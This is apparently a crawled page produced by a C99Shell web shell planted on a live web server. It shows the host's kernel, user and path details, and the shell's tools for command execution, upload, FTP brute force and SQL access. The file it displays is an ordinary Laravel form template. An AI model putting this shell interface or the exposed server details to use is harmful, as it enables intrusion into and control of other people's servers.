!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/portfolio.picotech.app/public_html/resources/views/customer/label/   drwxr-xr-x
Free 29.22 GB of 117.98 GB (24.76%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     form.blade.php (1.19 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<div class="form-group">
    <label for="word">@lang('customer.title') *</label>
    <input {{isset($label) && $label->title=='new'?'readonly':''}} value="{{isset($label) && $label->title?$label->title:old('title')}}" type="text" name="title"
           class="form-control" id="word"
           placeholder="@lang('Label Title')">
</div>

<div class="row">
    <div class="form-group col-sm-6">
        <label for="opt_type">{{trans('customer.status')}}</label>
        <select name="status" class="form-control" id="">
            <option {{isset($label) && $label->status=='active'?'selected':''}} value="active">{{trans('customer.active')}}</option>
            <option {{isset($label) && $label->status=='inactive'?'selected':''}} value="inactive">{{trans('customer.inactive')}}</option>
        </select>

    </div>
    <div class="col-sm-6">
        <label for="">Color  @if(isset($label) && isset($label->color)) <button class="btn disabled" disabled="disabled" style="padding: 0px 20px; background: {{$label->color}}">&nbsp;&nbsp;&nbsp;</button> @endif</label>
        <input type="color" class="form-control" value="{{isset($label) && isset($label->color)?$label->color:''}}" name="color">

    </div>
</div>


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.004 ]--